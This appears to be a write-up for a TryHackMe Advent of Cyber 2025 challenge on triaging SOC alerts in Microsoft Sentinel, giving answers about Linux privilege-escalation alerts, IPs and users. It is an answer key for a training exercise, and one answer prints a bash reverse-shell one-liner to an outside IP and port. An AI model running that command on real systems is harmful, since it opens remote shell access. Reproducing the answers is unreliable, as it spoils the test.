advent-of-cyber-2025

Room Link:
https://tryhackme.com/room/azuresentinel-aoc2025-a7d3h9k0p2

▶️ MyDFIR – Day 10 Video Walkthrough

Official walkthrough for quick onboarding:

🔗 YouTube Link:
https://youtu.be/0VRfOfFRHuU?si=qi2rup7OiDiKCae_

🎄 Advent of Cyber 2025 — Day 10 Write-Up

🧩 SOC Alert Triaging — Tinsel Triage

✅ Challenge Answers

1️⃣ How many entities are affected by the “Linux PrivEsc – Polkit Exploit Attempt” alert?

polkit alert

entities count

10

2️⃣ What is the severity of the “Linux PrivEsc – Sudo Shadow Access” alert?

sudo shadow severity

High

3️⃣ How many accounts were added to the sudoers group in the “Linux PrivEsc – User Added to Sudo Group” alert?

sudo group alert

sudo group count

4

🔎 In-Depth Log Analysis with Sentinel

1️⃣ What is the name of the kernel module installed in websrv-01?

kernel module kql

kernel module result

malicious_mod.ko

2️⃣ What is the unusual command executed within websrv-01 by the ops user?

reverse shell command

/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1

3️⃣ What is the source IP address of the first successful SSH login to storage-01?

ssh login source ip

172.16.0.12

4️⃣ What is the external source IP that successfully logged in as root to app-01?

external ssh root ip

203.0.113.45

5️⃣ Aside from the backup user, which user was added to the sudoers group in app-01?

sudoers new user

deploy